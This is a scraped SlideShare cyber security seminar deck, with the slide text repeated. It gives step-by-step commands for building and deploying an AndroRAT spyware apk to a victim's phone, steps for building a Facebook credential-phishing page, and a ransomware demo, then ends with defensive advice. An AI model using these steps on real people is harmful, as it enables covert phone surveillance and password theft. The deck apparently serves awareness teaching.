SlideShare a Scribd company logo

Cyber_Security_Seminar_PPTs_to Upload.pptx

Download as PPTX, PDF
D
DrMajidMumtaz

Ethical Hacking, Hands on Practice, Pen Testing, Penetration, Mobile hacking

Technology
1 of 48
Cyber Security / Ethical Hacking / Penetration Testing
Presentation Contents • Cyber Security /Ethical Hacking / Pen Testing • Threats: • Hacking • Malware • Phishing • Mobile Phone Hack • Attack Background • Android Hacking using AndroRAT • Practical Demonstration • Windows 10 Hack • Attack Background • Password Hack • Whole System Control • Practical Demonstration • Ransomware Attack • Background • Practical Demonstration • References
What is Cyber Security / Ethical hacking / penetration testing? Cyber Security: • It is related to characteristic of digital devices like computer, information technology, virtual reality, image processing, AI based automation solutions. • Security is the combination of Confidentiality, Integrity, Availability (CIA) triangle. Ethical Hacking • A set of high professional morals & principles. • Attempt to gain unauthorized access to a computer system, application or data. Penetration Testing • It is security exercise where a cyber-security expert attempts to find and exploit vulnerabilities in a digital equipment. • Like social media hacking, mobile hacking, Ransomware and others attacks.
01 ANALYSIS 02 LOGISTICS 03 PRODUCT 04 PROFIT 07 PLAN 06 PROCURE- MENT 08 MANAGE- MENT 05 DETERMINA- TION
Why and Who is doing hacking? • Financial (theft, fraud, blackmail) • Political /state (state level/ military) • Fame/ kudos (fun/ status) • Hacktivism (cause) • Pen testers (legal hacking) • Police/ FIA cyber crime division • Insider • Business
Mobile Hacking (Note : Only For Educational Purpose.) • Pre-requiste for Mobile Hacking: • Github installed • Python3 installed • Java installed • Local Machine (PC) IP address • Linux/Osx System
Mobile Hacking (Note : Only For Educational Purpose.) • Attack using AndroRAT: • A Tool used to control Android phone remotely • Client/Server application • Client-Side developed in Java language • Server is developed in Python • Windows/Linux/Osx System
Mobile Hacking (Note : Only For Educational Purpose.) • Step 1: Clone the repository from GitHub: • A following command should be used to clone the Git repository. Git clone https://github.com/karma9874/AndroRAT.git • Step 2: open the cloned repository in cmd/terminal cd <Directory_name> AndroRAT • Step 3: Installing necessary Libraries using PIP tool pip install –r requirements.txt
Mobile Hacking (Note : Only For Educational Purpose.) • Step 4: Building Malicious apk file for spying Cell phone: • A following command should be used to build the apk file. python3 androRAT.py - -build –i <your_IP_Address> -p 8089 –o <apk_name>.apk Find IP Address: Use ipconfig /all or ifconfig on cmd/terminal. • Step 5: Host the Listener as follows: python3 androRAT.py –shell –I 0.0.0.0 –p 8089 • Step 6: Open another terminal/cmd and run WebServer sudo apachectl start
Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via appending/email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • On Hacker side the following shell will appear and wait for listening connection:
Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears):
Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears): write help will show the command to use victim cell data. The installed apk hide it, no icons can seen on the screen
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo shows the device information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo camList, takepic and vibrate shows as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo, camList, ip shows Output as follows:
Mobile Hacking (Note : Only For Educational Purpose.) • The output of SIM information as follows:
Social Media Hack (Facebook, Twitter, Instagram etc.) • Background: Client/Server Architecture Clients Server 1. Client side Threats 2. Server side Threats 3. Network Threats
Social Media Hack (Facebook, Twitter, Instagram etc.) Email Spoofing & Phishing Attack • Uses a fake email address or simulates a genuine one in order to deceive user • Redirect user to webpage that looks like a social media page • Records the login information inputted, may attempt to download malware or perform XSS • According to Kapersky 1 in 5 Phishing Scams include Facebook Hacking FB Accounts Using Tabnapping.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Domain Name System (DNS): In Simple World • DNS map the Host Name with IP address, There are 13-root name servers in the world. DNS are placed on different regions world-wide. Host name ping as follows:
Social Media Hack (Facebook, Twitter, Instagram etc.) • In Windows, the file will be located under C:WindowsSystem32driversetc.
Social Media Hack (Facebook, Twitter, Instagram etc.) • WireShark tool is used to capture packets. let's see the traffic on the packet level: We have an IP address of 192.168.10.19, which is the IP address of our attacker
Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 1: First, we need to set up a phishing page. first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Rename the Facebook HTML page index.html. Step 2: Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 3: Next, we will create the passwords.txt file, where the target credentials will be stored. Step 4: Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Open the browser and navigate to http://www.facebook.com/: Now, log into your Facebook account using your username and password. and jump on the folder and see if we get anything on the passwords.txt file.
Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account
Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account • Don’t click any links on an email unless you can guarantee who its from. • Use a trusted method of contacting the company via a phone number, app or website. • Mark the email as spam and contact the organisation.
Ransomware Attack Background • Normally loaded onto a computer via a download/attachment/link from an email or website. • Will either lock the screen or encrypt your data. • Once Ransomware is uploaded on your computer/tablet/phone it is very difficult to remove without removing all of the data • Wannacry attack 2017 - One of the biggest cyber attacks to occur. • Is said to have hit 300,000 computers in 150 countries. • Companies affected include; K-electric, Life insurance company, NHS, Renault, FedEx, Spanish telecoms and gas companies, German railways etc. An Hacker Encrypt your data and demand ransom in the form of Bitcoins to decrypt back.
Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after Encryption, the file inside the folder can’t be readable.
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable now.
Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable again.
How to tackle Ransomware • Back up- Keep a backed up copy of your data. Ensure its not permanently connected to the network. • Patch- Keep your software up to date. Wannacry was successful as those affected computers hadn’t updated. The update contained a fix for the problem. • Attachments- Don’t click on links from emails/SMS as this could easily be from an untrusted source and contain malware like Ransomware
Public Wi-Fi • May not be trustworthy. They could share your information to other companies who operate in countries without any data protection. • You may not know who is watching you whilst you’re online. What to do and not do to • Don’t use online banking. Use your own data. • Don’t conduct any purchases • Use a virtual private network (VPN)
CYBER SECURITY Tips Tips for protecting yourself from cybersecurity threats in 2023: Password Policy Use strong passwords and change them regularly. Information Sharing vigilant Be careful about what information you share online. Firewall and Antivirus Install a firewall and antivirus software. Systems & software Keep your systems and software up to date. Unknown link and Attachments Don't click on links or open attachments from unknown senders. Data Backup Back up your data regularly. Lastly be aware of the latest cybersecurity threats.
Passwords Advice • Use 1 password per account. • Three random words use. Like Capitals, special characters and numbers is your own choice. • If you follow this advice your passwords security will be significantly increased against a brute force attack. • Password managers can be helpful to store your passwords.
Advice • In the physical world we’re good at protecting ourselves and our property, we need to replicate this in the digital world. • 80% of cyber-crime is preventable.
Advice • Update and migrate • Activate your firewall • Staff awareness • Data encryption • User accounts privileges i.e admin • Cyber insurance • Prepare Plan
You are the best defence! • Technology is only a small part of Cyber Defence • You are the most important person – protect yourself • For any businesses the most important and best defence is Cyber Security Aware employees – train your staff Always be aware! Always be on your guard! THANK YOU

Recommended

Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
Tenet Systems Pvt Ltd
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
DHRUV562167
 
Computer Security Threats
Computer Security ThreatsComputer Security Threats
Computer Security Threats
Quick Heal Technologies Ltd.
 
ICT Security.pdf
ICT Security.pdfICT Security.pdf
ICT Security.pdf
JoeMarieDormido2
 
Hacking
HackingHacking
Hacking
rameswara reddy venkat
 
Hacking
HackingHacking
Hacking
Roshan Chaudhary
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
Geoff Pesimo
 

Recommended

Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
Tenet Systems Pvt Ltd
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
DHRUV562167
 
Computer Security Threats
Computer Security ThreatsComputer Security Threats
Computer Security Threats
Quick Heal Technologies Ltd.
 
ICT Security.pdf
ICT Security.pdfICT Security.pdf
ICT Security.pdf
JoeMarieDormido2
 
Hacking
HackingHacking
Hacking
rameswara reddy venkat
 
Hacking
HackingHacking
Hacking
Roshan Chaudhary
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
Geoff Pesimo
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
NAWAZ KHAN
 
CS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityCS155 Computer Security at Stanford University
CS155 Computer Security at Stanford University
Rick Patterson
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
sxkkjbzq2k
 
31.ppt
31.ppt31.ppt
31.ppt
ssuserec53e73
 
31.ppt
31.ppt31.ppt
31.ppt
KarmanChandi
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
Salma Zafar
 
hacking
hackinghacking
hacking
ADAIKKAPPANS1
 
computer_security.ppt
computer_security.pptcomputer_security.ppt
computer_security.ppt
Asif Raza
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
Greater Noida Institute Of Technology
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By Nirmal
NIRMAL RAJ
 
Cyber security awareness presentation nepal
Cyber security awareness presentation nepalCyber security awareness presentation nepal
Cyber security awareness presentation nepal
ICT Frame Magazine Pvt. Ltd.
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
belsis
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
Rafel Ivgi
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
fangjiafu
 
Hacking intro
Hacking introHacking intro
Hacking intro
Milind Mishra
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
Mayur Nanotkar
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
Avansa Mid- en Zuidwest
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
Kalpesh Doru
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigation
Mehedi Hasan
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
Priyanka Aash
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
shyamraj55
 
Structuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessStructuring Teams and Portfolios for Success
Structuring Teams and Portfolios for Success
UXDXConf
 

More Related Content

Similar to Cyber_Security_Seminar_PPTs_to Upload.pptx

Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
sxkkjbzq2k
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By Nirmal
NIRMAL RAJ
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
fangjiafu
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
Avansa Mid- en Zuidwest
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigation
Mehedi Hasan
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
Priyanka Aash
 

Similar to Cyber_Security_Seminar_PPTs_to Upload.pptx (20)

ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
CS155 Computer Security at Stanford University
CS155 Computer Security at Stanford UniversityCS155 Computer Security at Stanford University
CS155 Computer Security at Stanford University
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
 
31.ppt
31.ppt31.ppt
31.ppt
 
31.ppt
31.ppt31.ppt
31.ppt
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
hacking
hackinghacking
hacking
 
computer_security.ppt
computer_security.pptcomputer_security.ppt
computer_security.ppt
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By Nirmal
 
Cyber security awareness presentation nepal
Cyber security awareness presentation nepalCyber security awareness presentation nepal
Cyber security awareness presentation nepal
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigation
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
 

Recently uploaded

Structuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessStructuring Teams and Portfolios for Success
Structuring Teams and Portfolios for Success
UXDXConf
 
ECS 2024 Teams Premium - Pretty Secure
ECS 2024 Teams Premium - Pretty SecureECS 2024 Teams Premium - Pretty Secure
ECS 2024 Teams Premium - Pretty Secure
Femke de Vroome
 
The UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, OcadoThe UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, Ocado
UXDXConf
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System Strategy
UXDXConf
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdf
Syngulon
 

Recently uploaded (20)

Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
Structuring Teams and Portfolios for Success
Structuring Teams and Portfolios for SuccessStructuring Teams and Portfolios for Success
Structuring Teams and Portfolios for Success
 
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
 
THE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreelTHE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreel
 
ECS 2024 Teams Premium - Pretty Secure
ECS 2024 Teams Premium - Pretty SecureECS 2024 Teams Premium - Pretty Secure
ECS 2024 Teams Premium - Pretty Secure
 
AI presentation and introduction - Retrieval Augmented Generation RAG 101
AI presentation and introduction - Retrieval Augmented Generation RAG 101AI presentation and introduction - Retrieval Augmented Generation RAG 101
AI presentation and introduction - Retrieval Augmented Generation RAG 101
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 
The UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, OcadoThe UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, Ocado
 
What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024What's New in Teams Calling, Meetings and Devices April 2024
What's New in Teams Calling, Meetings and Devices April 2024
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya HalderCustom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
Custom Approval Process: A New Perspective, Pavel Hrbacek & Anindya Halder
 
AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří Karpíšek
 
Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024Enterprise Knowledge Graphs - Data Summit 2024
Enterprise Knowledge Graphs - Data Summit 2024
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. Startups
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System Strategy
 
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfSimplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdf
 

Cyber_Security_Seminar_PPTs_to Upload.pptx

  • 1. Cyber Security / Ethical Hacking / Penetration Testing
  • 2. Presentation Contents • Cyber Security /Ethical Hacking / Pen Testing • Threats: • Hacking • Malware • Phishing • Mobile Phone Hack • Attack Background • Android Hacking using AndroRAT • Practical Demonstration • Windows 10 Hack • Attack Background • Password Hack • Whole System Control • Practical Demonstration • Ransomware Attack • Background • Practical Demonstration • References
  • 3. What is Cyber Security / Ethical hacking / penetration testing? Cyber Security: • It is related to characteristic of digital devices like computer, information technology, virtual reality, image processing, AI based automation solutions. • Security is the combination of Confidentiality, Integrity, Availability (CIA) triangle. Ethical Hacking • A set of high professional morals & principles. • Attempt to gain unauthorized access to a computer system, application or data. Penetration Testing • It is security exercise where a cyber-security expert attempts to find and exploit vulnerabilities in a digital equipment. • Like social media hacking, mobile hacking, Ransomware and others attacks.
  • 5. Why and Who is doing hacking? • Financial (theft, fraud, blackmail) • Political /state (state level/ military) • Fame/ kudos (fun/ status) • Hacktivism (cause) • Pen testers (legal hacking) • Police/ FIA cyber crime division • Insider • Business
  • 6. Mobile Hacking (Note : Only For Educational Purpose.) • Pre-requiste for Mobile Hacking: • Github installed • Python3 installed • Java installed • Local Machine (PC) IP address • Linux/Osx System
  • 7. Mobile Hacking (Note : Only For Educational Purpose.) • Attack using AndroRAT: • A Tool used to control Android phone remotely • Client/Server application • Client-Side developed in Java language • Server is developed in Python • Windows/Linux/Osx System
  • 8. Mobile Hacking (Note : Only For Educational Purpose.) • Step 1: Clone the repository from GitHub: • A following command should be used to clone the Git repository. Git clone https://github.com/karma9874/AndroRAT.git • Step 2: open the cloned repository in cmd/terminal cd <Directory_name> AndroRAT • Step 3: Installing necessary Libraries using PIP tool pip install –r requirements.txt
  • 9. Mobile Hacking (Note : Only For Educational Purpose.) • Step 4: Building Malicious apk file for spying Cell phone: • A following command should be used to build the apk file. python3 androRAT.py - -build –i <your_IP_Address> -p 8089 –o <apk_name>.apk Find IP Address: Use ipconfig /all or ifconfig on cmd/terminal. • Step 5: Host the Listener as follows: python3 androRAT.py –shell –I 0.0.0.0 –p 8089 • Step 6: Open another terminal/cmd and run WebServer sudo apachectl start
  • 10. Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
  • 11. Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via appending/email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
  • 12. Mobile Hacking (Note : Only For Educational Purpose.) • On Hacker side the following shell will appear and wait for listening connection:
  • 13. Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears):
  • 14. Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears): write help will show the command to use victim cell data. The installed apk hide it, no icons can seen on the screen
  • 15. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo shows the device information as follows:
  • 16. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
  • 17. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
  • 18. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo camList, takepic and vibrate shows as follows:
  • 19. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo, camList, ip shows Output as follows:
  • 20. Mobile Hacking (Note : Only For Educational Purpose.) • The output of SIM information as follows:
  • 21. Social Media Hack (Facebook, Twitter, Instagram etc.) • Background: Client/Server Architecture Clients Server 1. Client side Threats 2. Server side Threats 3. Network Threats
  • 22. Social Media Hack (Facebook, Twitter, Instagram etc.) Email Spoofing & Phishing Attack • Uses a fake email address or simulates a genuine one in order to deceive user • Redirect user to webpage that looks like a social media page • Records the login information inputted, may attempt to download malware or perform XSS • According to Kapersky 1 in 5 Phishing Scams include Facebook Hacking FB Accounts Using Tabnapping.
  • 23. Social Media Hack (Facebook, Twitter, Instagram etc.) • Domain Name System (DNS): In Simple World • DNS map the Host Name with IP address, There are 13-root name servers in the world. DNS are placed on different regions world-wide. Host name ping as follows:
  • 24. Social Media Hack (Facebook, Twitter, Instagram etc.) • In Windows, the file will be located under C:WindowsSystem32driversetc.
  • 25. Social Media Hack (Facebook, Twitter, Instagram etc.) • WireShark tool is used to capture packets. let's see the traffic on the packet level: We have an IP address of 192.168.10.19, which is the IP address of our attacker
  • 26. Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 1: First, we need to set up a phishing page. first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Rename the Facebook HTML page index.html. Step 2: Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST.
  • 27. Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 3: Next, we will create the passwords.txt file, where the target credentials will be stored. Step 4: Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Open the browser and navigate to http://www.facebook.com/: Now, log into your Facebook account using your username and password. and jump on the folder and see if we get anything on the passwords.txt file.
  • 28.
  • 29. Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account
  • 30. Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account • Don’t click any links on an email unless you can guarantee who its from. • Use a trusted method of contacting the company via a phone number, app or website. • Mark the email as spam and contact the organisation.
  • 31. Ransomware Attack Background • Normally loaded onto a computer via a download/attachment/link from an email or website. • Will either lock the screen or encrypt your data. • Once Ransomware is uploaded on your computer/tablet/phone it is very difficult to remove without removing all of the data • Wannacry attack 2017 - One of the biggest cyber attacks to occur. • Is said to have hit 300,000 computers in 150 countries. • Companies affected include; K-electric, Life insurance company, NHS, Renault, FedEx, Spanish telecoms and gas companies, German railways etc. An Hacker Encrypt your data and demand ransom in the form of Bitcoins to decrypt back.
  • 32. Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
  • 33. Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
  • 34. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
  • 35. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
  • 36. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after Encryption, the file inside the folder can’t be readable.
  • 37. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable now.
  • 38. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable again.
